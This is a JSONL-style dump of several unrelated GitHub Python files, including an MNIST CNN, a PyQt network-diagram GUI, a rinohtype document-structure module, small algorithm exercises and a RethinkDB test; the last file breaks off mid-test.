conv_pool_layer(\n inputs=input_layer,\n filters=32,\n conv_sample_size=4,\n pool_size=2,\n name='conv_pool1') # Output 26x26x32 -> 13x13x32\n conv_pool2 = conv_pool_layer(\n inputs=conv_pool1,\n filters=64,\n conv_sample_size=5,\n pool_size=3,\n name='conv_pool2') # Output 9x9x64 -> 3x3x64\n\n # Final Fully/densely-connected layer\n conv_pool2_flat = tf.reshape(conv_pool2, [-1, 3 * 3 * 64])\n fc1 = tf.layers.dense(\n inputs=conv_pool2_flat,\n units=150,\n activation=tf.nn.relu,\n name='fc1')\n if FLAGS.dropout:\n dropout = tf.layers.dropout(\n inputs=fc1,\n rate=0.5,\n training=(mode == learn.ModeKeys.TRAIN),\n name='dropout')\n else:\n dropout = fc1\n\n # Final connected layer\n logits = tf.layers.dense(dropout, units=10, name='logits')\n\n loss = None\n train_op = None\n\n # Configure loss function.\n if mode != learn.ModeKeys.INFER:\n onehot_labels = tf.one_hot(labels, depth=10)\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=onehot_labels, logits=logits)\n\n # Training op\n if mode == learn.ModeKeys.TRAIN:\n train_op = tf.contrib.layers.optimize_loss(\n loss=loss,\n global_step=tf.contrib.framework.get_global_step(),\n learning_rate=0.001,\n optimizer=tf.train.AdamOptimizer)\n tf.summary.scalar('loss', loss)\n\n # Predict values.\n predictions = {\n 'classes': tf.argmax(logits, axis=1, name='classes'),\n 'probabilities': tf.nn.softmax(logits, name='softmax_tensor'),\n }\n\n return model_fn_lib.ModelFnOps(\n mode=mode,\n predictions=predictions,\n loss=loss,\n train_op=train_op\n )\n\ndef main(unused_argv):\n \"\"\"Load data and train.\"\"\"\n # Read MNIST data.\n with open('MNIST_data/train-images-processed', 'rb') as file:\n train_data = process_data.read_images(file).astype(np.float32)\n with open('MNIST_data/train-labels-processed', 'rb') as file:\n train_labels = process_data.read_labels(file).astype(np.int32)\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': train_data},\n y=train_labels,\n batch_size=100,\n num_epochs=FLAGS.epochs,\n shuffle=True)\n\n with open('MNIST_data/t10k-images-processed', 'rb') as file:\n eval_data = process_data.read_images(file).astype(np.float32)\n with open('MNIST_data/t10k-labels-processed', 'rb') as file:\n eval_labels = process_data.read_labels(file).astype(np.int32)\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': eval_data},\n y=eval_labels,\n batch_size=100,\n shuffle=False)\n\n # Create classifiers.\n model_dirs = ['model/model_%d' % i for i in range(FLAGS.columns)]\n mnist_classifiers = [\n learn.Estimator(\n model_fn=cnn_model_fn,\n # config=learn.RunConfig(save_checkpoints_steps=600),\n model_dir=model_dir)\n for model_dir in model_dirs]\n\n # Train.\n if FLAGS.train:\n # Delete existing model if it exists.\n if FLAGS.clean:\n try:\n tf.gfile.DeleteRecursively('model')\n except tferrors.NotFoundError:\n pass\n\n monitors = [\n # learn.monitors.ValidationMonitor(\n # input_fn=eval_input_fn,\n # every_n_steps=600,\n # metrics={\n # 'accuracy': learn.MetricSpec(\n # metric_fn=tf.metrics.accuracy, prediction_key='classes')\n # })\n ]\n for classifier in mnist_classifiers:\n classifier.fit(\n input_fn=train_input_fn,\n monitors=monitors)\n\n # Evaluate.\n predictions = []\n for classifier in mnist_classifiers:\n probabilities = classifier.predict(\n input_fn=eval_input_fn,\n outputs=['probabilities'])\n prediction = [x['probabilities'] for x in probabilities]\n predictions.append(prediction)\n\n # Print results.\n errors = []\n for i in range(len(predictions)):\n prediction_numbers = np.argmax(predictions[i], axis=1)\n accuracy = np.mean(np.equal(prediction_numbers, eval_labels)) * 100.0\n errors.append(100 - accuracy)\n print('errors %s%%' % str(errors))\n print('average %g stddev %g' % (np.mean(errors), np.std(errors)))\n average_predictions = np.argmax(np.mean(predictions, axis=0), axis=1)\n accuracy = np.mean(np.equal(average_predictions, eval_labels)) * 100.0\n print('multi-column error %g%%' % (100 - accuracy))\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"spencels/mnist_cnn","sub_path":"mnist_basic.py","file_name":"mnist_basic.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31053496212","text":"import sys\nsys.stdin = open('13755.txt')\n\ndef palindrome(arr, N, strLens):\n arrRotate = list(map(list, zip(*arr)))\n # 가로로 된 문장 찾기 -> 세로로 된것도 걍 돌림;;;힘드러\n for i in range(N): # 행\n for j in range(N - strLens + 1): # 열\n output = ''\n for k in range(strLens):\n if arr[i][j+k] != arr[i][j+strLens-1-k]:\n break\n output += arr[i][j+k]\n else:\n return output\n\n output = ''\n for k in range(strLens):\n if arrRotate[i][j + k] != arrRotate[i][j + strLens - 1 - k]:\n break\n output += arrRotate[i][j + k]\n else:\n return output\n # 여기는 슬라이싱으로 푼 것\n # char1 = arr[i][j:j+strLens]\n # char2 = arrRotate[i][j:j+strLens]\n # if char1 == char1[::-1]:\n # return ''.join(char1)\n # elif char2 == char2[::-1]:\n # return ''.join(char2)\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, lenM = map(int, input().split())\n text = [list(input()) for _ in range(N)]\n\n ans = palindrome(text, N, lenM)\n print(f'#{t} {ans}')\n\n","repo_name":"gyur1kim/APS-SWEA","sub_path":"알고리즘(1)/0816_string실습/13755_회문문제.py","file_name":"13755_회문문제.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36586468508","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QGraphicsSceneMouseEvent, QMainWindow, QDesktopWidget, QPushButton, QGraphicsScene, QGraphicsView, \\\r\n QTableWidget, QTableWidgetItem, QInputDialog, QGraphicsRectItem, QLabel, QLineEdit, QVBoxLayout, QDialog, QComboBox\r\nfrom PyQt5.QtGui import QColor, QBrush, QPen, QPainter\r\nfrom PyQt5.QtCore import Qt, QPointF, QRectF, pyqtSignal, QTimer, pyqtSlot\r\nfrom PyQt5.QtWidgets import QGraphicsItem, QGraphicsLineItem\r\n\r\nfrom dialogs import RouterDialog, PCDialog, SwitchDialog\r\n\r\n\r\nclass Object(QGraphicsRectItem):\r\n def __init__(self, rect: QRectF, pen: QPen, brush: QBrush):\r\n super().__init__(rect)\r\n self.setFlag(self.ItemIsMovable)\r\n self.setPen(pen)\r\n self.setBrush(brush)\r\n self.connections = []\r\n\r\n def get_type(self) -> str:\r\n return self.type\r\n\r\n def add_connection(self, connection):\r\n self.connections.append(connection)\r\n\r\n def remove_connection(self, connection):\r\n self.connections.remove(connection)\r\n\r\n def update_connections(self):\r\n for connection in self.connections:\r\n connection.update()\r\n\r\n def itemChange(self, change, value):\r\n if change == QGraphicsItem.ItemPositionChange:\r\n self.update_connections()\r\n return super().itemChange(change, value)\r\n\r\n\r\nclass Connection(QGraphicsLineItem):\r\n def __init__(self, start_item, end_item):\r\n super().__init__()\r\n self.start_item = start_item\r\n self.end_item = end_item\r\n self.start_item.add_connection(self)\r\n self.end_item.add_connection(self)\r\n self.update()\r\n\r\n def update(self):\r\n start_pos = self.start_item.pos() + QPointF(self.start_item.rect().width() / 2,\r\n self.start_item.rect().height() / 2)\r\n end_pos = self.end_item.pos() + QPointF(self.end_item.rect().width() / 2,\r\n self.end_item.rect().height() / 2)\r\n self.setLine(start_pos.x(), start_pos.y(), end_pos.x(), end_pos.y())\r\n\r\n\r\nclass Router(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(30, 30)), QPen(Qt.black), QBrush(Qt.gray))\r\n self.dialog = RouterDialog()\r\n self.type = \"router\"\r\n\r\n def mouseDoubleClickEvent(self, event):\r\n self.dialog.exec()\r\n\r\n\r\nclass Switch(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(50, 30)), QPen(Qt.yellow), QBrush(Qt.white))\r\n self.type = \"switch\"\r\n self.dialog = SwitchDialog()\r\n\r\n def mouseDoubleClickEvent(self, event: QGraphicsSceneMouseEvent):\r\n self.dialog.exec()\r\n\r\n\r\nclass PC(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(30, 30)), QPen(Qt.black), QBrush(Qt.yellow))\r\n self.dialog = PCDialog()\r\n self.type = \"pc\"\r\n\r\n def mouseDoubleClickEvent(self, event: QGraphicsSceneMouseEvent):\r\n self.dialog.exec()\r\n\r\n\r\ndef create_object_of_type(type: str) -> Object:\r\n if type == 'switch':\r\n obj = Switch()\r\n elif type == 'router':\r\n obj = Router()\r\n elif type == 'pc':\r\n obj = PC()\r\n return obj\r\n\r\n\r\nclass MyView(QGraphicsView):\r\n def __init__(self, scene, parent=None):\r\n super().__init__(scene, parent)\r\n self.setRenderHint(QPainter.Antialiasing)\r\n\r\n def mousePressEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n item = self.itemAt(event.pos())\r\n if isinstance(item, Object):\r\n item.setFlag(QGraphicsItem.ItemIsMovable, True)\r\n item.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)\r\n\r\n super().mousePressEvent(event)\r\n\r\n def mouseReleaseEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n item = self.itemAt(event.pos())\r\n if isinstance(item, Object):\r\n item.setFlag(QGraphicsItem.ItemIsMovable, False)\r\n item.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, False)\r\n\r\n super().mouseReleaseEvent(event)\r\n\r\n\r\nclass MyWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # Определяем размеры экрана пользователя\r\n screen = QDesktopWidget().screenGeometry()\r\n width, height = screen.width(), screen.height()\r\n # Устанавливаем размеры окна\r\n self.setGeometry(0, 0, width, height)\r\n\r\n self.setWindowTitle('My Application')\r\n self.setStyleSheet(\"background-color: #4d4dff;\")\r\n\r\n # Создаем сцену для отрисовки объектов\r\n self.scene = QGraphicsScene(self)\r\n self.view = MyView(self.scene, self)\r\n self.view.setGeometry(0, 0, width, height)\r\n self.view.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.view.setBackgroundBrush(QBrush(QColor(220, 220, 220)))\r\n\r\n # Добавляем кнопки\r\n self.add_switch_button = QPushButton('Добавить SWITCH', self)\r\n self.add_switch_button.clicked.connect(lambda: self.add_object('switch'))\r\n self.add_switch_button.setGeometry(10, 50, 150, 30)\r\n\r\n self.add_router_button = QPushButton('Добавить маршрутизатор', self)\r\n self.add_router_button.clicked.connect(lambda: self.add_object('router'))\r\n self.add_router_button.setGeometry(10, 100, 150, 30)\r\n\r\n self.add_pc_button = QPushButton('Добавить PC', self)\r\n self.add_pc_button.clicked.connect(lambda: self.add_object('pc'))\r\n self.add_pc_button.setGeometry(10, 150, 150, 30)\r\n\r\n # Создаем список объектов\r\n self.objects = []\r\n\r\n self.connections = []\r\n self.current_connection = None\r\n\r\n self.show()\r\n\r\n def add_object(self, object_type):\r\n obj = create_object_of_type(object_type)\r\n self.scene.addItem(obj)\r\n self.objects.append(obj)\r\n\r\n def mousePressEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n obj = self.scene.itemAt(event.pos(), self.view.transform())\r\n if isinstance(obj, Object):\r\n self.current_connection = Connection(obj, None)\r\n self.connections.append(self.current_connection)\r\n\r\n def mouseMoveEvent(self, event):\r\n if self.current_connection:\r\n self.current_connection.update()\r\n\r\n def mouseReleaseEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n obj = self.scene.itemAt(event.pos(), self.view.transform())\r\n if isinstance(obj, Object) and self.current_connection:\r\n self.current_connection.end_item = obj\r\n self.current_connection.update()\r\n self.current_connection = None\r\n elif self.current_connection in self.connections:\r\n self.scene.removeItem(self.current_connection)\r\n self.current_connection.start_item.remove_connection(self.current_connection)\r\n self.current_connection.end_item.remove_connection(self.current_connection)\r\n self.connections.remove(self.current_connection)\r\n self.current_connection = None\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = MyWindow()\r\n sys.exit(app.exec_())\r\n","repo_name":"DimaAnglichanin/CiscoPacketPython","sub_path":"CiscoPacket.py","file_name":"CiscoPacket.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28789495494","text":"# ABC301-A\n# TとAの数を比較する\n# 同数ならば、最後に出てくる文字で条件分岐すればいい\nimport sys\n\nrr = lambda: sys.stdin.readline().rstrip()\nri = lambda: int(sys.stdin.readline())\n\nn = ri()\ns = rr()\ncnt_T = s.count('T')\ncnt_A = s.count('A')\nif cnt_T > cnt_A:\n print('T')\nelif cnt_A > cnt_T:\n print('A')\nelse:\n print('A' if s[-1] == 'T' else 'T')\n","repo_name":"calliope-pro/algorithm","sub_path":"problems/ABC/301/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"327756693","text":"from contextlib import suppress\nfrom itertools import chain, takewhile\n\nfrom .attribute import Attribute, Bool, Integer, OverrideDefault\nfrom .draw import Line, LineStyle\nfrom .element import create_destination\nfrom .flowable import GroupedFlowables, StaticGroupedFlowables, WarnFlowable\nfrom .flowable import LabeledFlowable, GroupedLabeledFlowables\nfrom .flowable import Flowable, FlowableStyle, GroupedFlowablesStyle\nfrom .layout import PageBreakException\nfrom .number import NumberStyle, Label, LabelStyle, format_number\nfrom .paragraph import (ParagraphBase, StaticParagraph, Paragraph,\n ParagraphStyle)\nfrom .reference import (ReferenceField, ReferencingParagraph,\n ReferencingParagraphStyle)\nfrom .text import StyledText, SingleStyledText, MixedStyledText, Tab\nfrom .style import PARENT_STYLE\nfrom .strings import StringCollection, String, StringField\nfrom .util import NotImplementedAttribute, itemcount\n\n__all__ = ['Section', 'Heading',\n 'ListStyle', 'List', 'ListItem', 'ListItemLabel', 'DefinitionList',\n 'Header', 'Footer',\n 'TableOfContentsSection', 'TableOfContentsStyle', 'TableOfContents',\n 'ListOfStyle',\n 'TableOfContentsEntry', 'Admonition', 'AdmonitionStyle',\n 'AdmonitionTitleParagraph',\n 'HorizontalRule', 'HorizontalRuleStyle', 'OutOfLineFlowables']\n\n\nclass SectionTitles(StringCollection):\n \"\"\"Collection of localized titles for common sections\"\"\"\n\n contents = String('Title for the table of contents section')\n list_of_figures = String('Title for the list of figures section')\n list_of_tables = String('Title for the list of tables section')\n chapter = String('Label for top-level sections')\n index = String('Title for the index section')\n\n\nclass SectionStyle(GroupedFlowablesStyle):\n show_in_toc = Attribute(Bool, True, 'List this section in the table of '\n 'contents')\n\n\nclass NewChapterException(PageBreakException):\n pass\n\n\nclass SectionBase(GroupedFlowables):\n style_class = SectionStyle\n break_exception = NewChapterException\n\n @property\n def category(self):\n return 'Chapter' if self.level == 1 else 'Section'\n\n @property\n def level(self):\n try:\n return self.parent.level + 1\n except AttributeError:\n return 1\n\n @property\n def section(self):\n return self\n\n def show_in_toc(self, container):\n parent_show_in_toc = (self.parent is None\n or self.parent.section is None\n or self.parent.section.show_in_toc(container))\n return (self.get_style('show_in_toc', container)\n and not self.is_hidden(container)\n and parent_show_in_toc)\n\n def create_destination(self, container, at_top_of_container=False):\n pass # destination is set by the section's Heading\n\n\nclass Section(StaticGroupedFlowables, SectionBase):\n \"\"\"A subdivision of a document\n\n A section usually has a heading associated with it, which is optionally\n numbered.\n\n \"\"\"\n\n\nclass HeadingStyle(ParagraphStyle):\n keep_with_next = OverrideDefault(True)\n numbering_level = OverrideDefault(-1)\n\n\nclass Heading(StaticParagraph):\n \"\"\"The title for a section\n\n Args:\n content (StyledText): this heading's text\n\n \"\"\"\n\n style_class = HeadingStyle\n has_title = True\n\n @property\n def referenceable(self):\n return self.section\n\n def prepare(self, container):\n super().prepare(container)\n container.document._sections.append(self.section)\n\n def flow(self, container, last_descender, state=None, **kwargs):\n if self.level == 1 and container.page.chapter_title:\n container.page.create_chapter_title(self)\n result = 0, 0, None\n else:\n result = super().flow(container, last_descender, state, **kwargs)\n return result\n\n def flow_inner(self, container, descender, state=None, **kwargs):\n result = super().flow_inner(container, descender, state=state, **kwargs)\n if not state.initial:\n create_destination(self.section, container, True)\n return result\n\n\nclass ListStyle(GroupedFlowablesStyle, NumberStyle):\n ordered = Attribute(Bool, False, 'This list is ordered or unordered')\n bullet = Attribute(StyledText, SingleStyledText('\\N{BULLET}'),\n 'Bullet to use in unordered lists')\n\n\nclass List(GroupedLabeledFlowables, StaticGroupedFlowables):\n style_class = ListStyle\n\n def __init__(self, list_items, start_index=1,\n id=None, style=None, parent=None):\n super().__init__(list_items, id=id, style=style, parent=parent)\n self.start_index = start_index\n\n def index(self, item, container):\n items = filter(lambda itm: not itm.label.get_style('hide', container),\n takewhile(lambda li: li != item, self.children))\n return self.start_index + itemcount(items)\n\n\nclass ListItem(LabeledFlowable):\n def __init__(self, flowable, id=None, style=None, parent=None):\n label = ListItemLabel()\n super().__init__(label, flowable, id=id, style=style, parent=parent)\n\n\nclass ListItemLabelStyle(ParagraphStyle, LabelStyle):\n number_separator = OverrideDefault(None)\n\n\nclass ListItemLabel(ParagraphBase, Label):\n style_class = ListItemLabelStyle\n\n def text(self, container):\n label = self._label(container)\n return MixedStyledText(self.format_label(label, container), parent=self)\n\n def _label(self, container):\n list_item = self.parent\n list = list_item.parent\n if list.get_style('ordered', container):\n number_format = list.get_style('number_format', container)\n separator = self.get_style('number_separator', container)\n index = list.index(list_item, container)\n label = format_number(index, number_format)\n if separator is not None:\n parent_list_item = None\n parent = list.parent\n while parent:\n if isinstance(parent, ListItem):\n parent_list_item = parent\n break\n parent = parent.parent\n if parent_list_item:\n parent_label = parent_list_item.label._label(container)\n separator_string = separator.to_string(container)\n label = parent_label + separator_string + label\n else:\n label = list.get_style('bullet', container)\n return label\n\n\n\nclass DefinitionList(GroupedLabeledFlowables, StaticGroupedFlowables):\n pass\n\n\nclass Header(StaticParagraph):\n pass\n\n\nclass Footer(StaticParagraph):\n pass\n\n\nclass TableOfContentsStyle(GroupedFlowablesStyle, ParagraphStyle):\n depth = Attribute(Integer, 3, 'The number of section levels to include in '\n 'the table of contents')\n\n def __init__(self, base=None, **attributes):\n super().__init__(base=base, **attributes)\n\n\nclass TableOfContentsSection(Section):\n def __init__(self):\n section_title = StringField(SectionTitles, 'contents')\n super().__init__([Heading(section_title, style='unnumbered'),\n TableOfContents()],\n style='table of contents')\n\n def __repr__(self):\n return '{}()'.format(type(self).__name__)\n\n def get_id(self, document, create=True):\n try:\n return document.metadata['toc_ids'][0]\n except KeyError:\n return super().get_id(document, create)\n\n def get_ids(self, document):\n yield self.get_id(document)\n yield from document.metadata.get('toc_ids', [])[1:]\n\n\nclass TableOfContents(GroupedFlowables):\n style_class = TableOfContentsStyle\n location = 'table of contents'\n\n def __init__(self, local=False, id=None, style=None, parent=None):\n super().__init__(id=id, style=style, parent=parent)\n self.local = local\n self.source = self\n\n def __repr__(self):\n args = ''.join(', {}={}'.format(name, repr(getattr(self, name)))\n for name in ('id', 'style')\n if getattr(self, name) is not None)\n return '{}(local={}{})'.format(type(self).__name__, self.local, args)\n\n def flowables(self, container):\n def limit_items(items, section):\n while next(items) is not section: # fast-forward `items` to the\n pass # first sub-section of `section`\n for item in items:\n if item.level <= section.level:\n break\n yield item\n\n depth = self.get_style('depth', container)\n if self.local and self.section:\n depth += self.level - 1\n items = (section for section in container.document._sections\n if section.show_in_toc(container) and section.level <= depth)\n if self.local and self.section:\n items = limit_items(items, self.section)\n for section in items:\n yield TableOfContentsEntry(section, parent=self)\n\n\nclass TableOfContentsEntryStyle(ReferencingParagraphStyle):\n text = OverrideDefault(ReferenceField('number')\n + Tab() + ReferenceField('title')\n + Tab() + ReferenceField('page'))\n\n\nclass TableOfContentsEntry(ReferencingParagraph):\n style_class = TableOfContentsEntryStyle\n\n def __init__(self, flowable, id=None, style=None, parent=None):\n super().__init__(flowable, id=id, style=style, parent=parent)\n\n @property\n def depth(self):\n return self.target_id_or_flowable.level\n\n\nclass ListOfSection(Section):\n list_class = NotImplementedAttribute()\n\n def __init__(self):\n key = 'list_of_{}s'.format(self.list_class.category.lower())\n section_title = StringField(SectionTitles, key)\n self.list_of = self.list_class()\n super().__init__([Heading(section_title, style='unnumbered'),\n self.list_of],\n style='list of {}'.format(self.category))\n\n def __repr__(self):\n return '{}()'.format(type(self).__name__)\n\n def is_hidden(self, container):\n return (super().is_hidden(container)\n or self.list_of.is_hidden(container))\n\n\nclass ListOfStyle(GroupedFlowablesStyle, ParagraphStyle):\n pass\n\n\nclass ListOf(GroupedFlowables):\n category = NotImplementedAttribute()\n style_class = ListOfStyle\n\n def __init__(self, local=False, id=None, style=None, parent=None):\n super().__init__(id=id, style=style, parent=parent)\n self.local = local\n self.source = self\n\n def __repr__(self):\n args = ''.join(', {}={}'.format(name, repr(getattr(self, name)))\n for name in ('id', 'style')\n if getattr(self, name) is not None)\n return '{}(local={}{})'.format(type(self).__name__, self.local, args)\n\n @property\n def location(self):\n return 'List of {}s'.format(self.category)\n\n def is_hidden(self, container):\n try:\n next(self.flowables(container))\n except StopIteration:\n return True\n return False\n\n def flowables(self, container):\n document = container.document\n category_counters = document.counters.get(self.category, {})\n\n def limit_items(items, section):\n for item in items: # fast-forward `items` to the\n if item.section is section: # first sub-section of `section`\n yield item\n break\n for item in items:\n if not (item.section.level > section.level\n or item.section is section):\n break\n yield item\n\n def items_in_section(section):\n section_id = (section.get_id(document, create=False)\n if section else None)\n yield from category_counters.get(section_id, [])\n\n items = chain(items_in_section(None),\n *(items_in_section(section)\n for section in document._sections))\n\n if self.local and self.section:\n items = limit_items(items, self.section)\n for caption in items:\n yield ListOfEntry(caption.referenceable, parent=self)\n\n\nclass ListOfEntryStyle(ReferencingParagraphStyle):\n text = OverrideDefault(ReferenceField('reference')\n + ': ' + ReferenceField('title')\n + Tab() + ReferenceField('page'))\n\n\nclass ListOfEntry(ReferencingParagraph):\n style_class = ListOfEntryStyle\n\n\nclass AdmonitionStyle(GroupedFlowablesStyle):\n inline_title = Attribute(Bool, True, \"Show the admonition's title inline \"\n \"with the body text, if possible\")\n\n\nclass AdmonitionTitles(StringCollection):\n \"\"\"Collection of localized titles for common admonitions\"\"\"\n\n attention = String('Title for attention admonitions')\n caution = String('Title for caution admonitions')\n danger = String('Title for danger admonitions')\n error = String('Title for error admonitions')\n hint = String('Title for hint admonitions')\n important = String('Title for important admonitions')\n note = String('Title for note admonitions')\n tip = String('Title for tip admonitions')\n warning = String('Title for warning admonitions')\n seealso = String('Title for see-also admonitions')\n\n\nclass Admonition(StaticGroupedFlowables):\n style_class = AdmonitionStyle\n\n def __init__(self, flowables, title=None, type=None,\n id=None, style=None, parent=None):\n super().__init__(flowables, id=id, style=style, parent=parent)\n self.custom_title = title\n self.admonition_type = type\n\n @property\n def custom_title_text(self):\n return self.custom_title.to_string(None) if self.custom_title else None\n\n def title(self, document):\n return (self.custom_title\n or document.get_string(AdmonitionTitles, self.admonition_type))\n\n def flowables(self, container):\n title = self.title(container.document)\n with suppress(AttributeError):\n title = title.copy()\n flowables = super().flowables(container)\n first_flowable = next(flowables)\n inline_title = self.get_style('inline_title', container)\n if inline_title and isinstance(first_flowable, Paragraph):\n title = MixedStyledText(title, style='inline title')\n kwargs = dict(id=first_flowable.id, style=first_flowable.style,\n source=first_flowable.source, parent=self)\n title_plus_content = title + first_flowable.content\n paragraph = AdmonitionTitleParagraph(title_plus_content, **kwargs)\n paragraph.secondary_ids = first_flowable.secondary_ids\n yield paragraph\n else:\n yield Paragraph(title, style='title', parent=self)\n yield first_flowable\n yield from flowables\n\n\nclass AdmonitionTitleParagraph(Paragraph):\n pass\n\n\nclass HorizontalRuleStyle(FlowableStyle, LineStyle):\n pass\n\n\nclass HorizontalRule(Flowable):\n style_class = HorizontalRuleStyle\n\n def render(self, container, descender, state, **kwargs):\n width = float(container.width)\n line = Line((0, 0), (width, 0), parent=self)\n line.render(container)\n return width, 0, 0\n\n\nclass OutOfLineFlowables(GroupedFlowables):\n def __init__(self, name, align=None, width=None, id=None, style=None,\n parent=None):\n super().__init__(align=align, width=width, id=id, style=style,\n parent=parent)\n self.name = name\n\n def prepare(self, container):\n with suppress(KeyError):\n for flowable in container.document.supporting_matter[self.name]:\n flowable.parent = self\n\n def flowables(self, container):\n try:\n yield from container.document.supporting_matter[self.name]\n except KeyError:\n yield WarnFlowable(\"No out-of-line content is registered for \"\n f\"'{self.name}'\", self)\n","repo_name":"brechtm/rinohtype","sub_path":"src/rinoh/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":16362,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"68"} +{"seq_id":"41468022198","text":"import numpy as np\nfrom joblib import Parallel, delayed\n\n\ndef _permutations(rng, x, n):\n for _ in range(n):\n yield rng.permutation(x)\n\ndef permute_func(func, X, Y, n_perm=99,\n random_state=None, n_procs=1):\n \"\"\"\n Permute Y, apply func to generate a distribution.\n\n Params:\n func: takes X, Y as params and returns a number\n X: ndarray\n Y: ndarray, to permute along first axis\n n_perm: int number of permutations\n random_state: int random seed\n n_procs: int number of processes for parallelization\n\n Returns:\n distrib: ndarray (n_perm,)\n \"\"\"\n rng = np.random.default_rng(random_state)\n perms = _permutations(rng, len(Y), n_perm)\n\n distrib = Parallel(n_jobs=n_procs)(delayed(func)(X, Y[perm])\n for perm in perms)\n return np.array(distrib)\n","repo_name":"kimsin98/utils","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74276648537","text":"from ..helper import get_singular_name\nfrom ..write_text import write_text\n\n\ndef parse_body_part(json, origin):\n # See comments in `body_part_struct::load` of bodypart.cpp about why xxx\n # and xxx_multiple are not inside a single translation object.\n name = get_singular_name(json[\"name\"])\n\n write_text(json[\"name\"], origin, comment=\"Name of body part\")\n\n if \"name_multiple\" in json:\n write_text(json[\"name_multiple\"], origin, comment=\"Name of body part\")\n\n write_text(json[\"accusative\"], origin,\n comment=\"Accusative name of body part\")\n\n if \"accusative_multiple\" in json:\n write_text(json[\"accusative_multiple\"], origin,\n comment=\"Accusative name of body part\")\n\n write_text(json[\"encumbrance_text\"], origin,\n comment=\"Encumbrance text of body part \\\"{}\\\"\".format(name))\n\n write_text(json[\"heading\"], origin,\n comment=\"Heading of body part \\\"{}\\\"\".format(name))\n\n write_text(json[\"heading_multiple\"], origin,\n comment=\"Heading of body part \\\"{}\\\"\".format(name))\n\n if \"smash_message\" in json:\n write_text(json[\"smash_message\"], origin,\n comment=\"Smash message of body part \\\"{}\\\"\".format(name))\n\n if \"hp_bar_ui_text\" in json:\n write_text(json[\"hp_bar_ui_text\"], origin,\n comment=\"HP bar UI text of body part \\\"{}\\\"\".format(name))\n","repo_name":"CleverRaven/Cataclysm-DDA","sub_path":"lang/string_extractor/parsers/body_part.py","file_name":"body_part.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":9151,"dataset":"github-code","pt":"68"} +{"seq_id":"74726953177","text":"import asyncio\nimport random\n\n\nasync def my_other(id):\n process_time = random.randint(1, 5)\n await asyncio.sleep(process_time)\n print(f\"Coroutine {id}, has successfully completed after {process_time} seconds\")\n\n\nasync def my_coroutine():\n tasks = []\n for i in range(10):\n tasks.append(asyncio.ensure_future(my_other(i)))\n await asyncio.gather(*tasks)\n print(\"All done\")\n\n\ndef main():\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(my_coroutine())\n finally:\n loop.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"artheadsweden/python_adv_april19","sub_path":"Day2/Async3.py","file_name":"Async3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26341272638","text":"for i in range(0, 256):\n print(i)\n\n\nfor i in range(0, 1000, 5):\n print(i)\n\n\nfor count in range(1, 100, 1):\n if count / 5:\n print(\"Coding\")\n if count / 10:\n print(\"Coding DoJo\")\n\n\nfor countOdd in range(0, 300, 1):\n if countOdd % 2 != 1:\n countOdd += countOdd\n print(countOdd)\n\n\n\ny = 2018\nwhile y > 0:\n print(y)\n y = y - 4\n if y == 0:\n break\nelse:\n print(\"Final\")\n\ndef reverslist(arr):\n reversed(arr)\nreverslist([1,2,3,4,5])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MaksimDauhaleu/Python_Stack","sub_path":"python/basic1.py","file_name":"basic1.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73551813335","text":"from rethinkdb import r\nfrom tests.common import assertEqual\nfrom tests.functional.common import MockTest\n\n\nclass TestTableMod(MockTest):\n @staticmethod\n def get_data():\n return {\n \"dbs\": {\n \"db_one\": {\"tables\": {\"one_x\": [], \"one_y\": []}},\n \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n }\n }\n\n def test_table_list_1(self, conn):\n expected = set([\"one_x\", \"one_y\"])\n result = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected, set(list(result)))\n\n def test_table_list_2(self, conn):\n expected = set([\"two_x\", \"two_y\"])\n result = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected, set(list(result)))\n\n def test_table_create_1(self, conn):\n expected_1 = set([\"one_x\", \"one_y\", 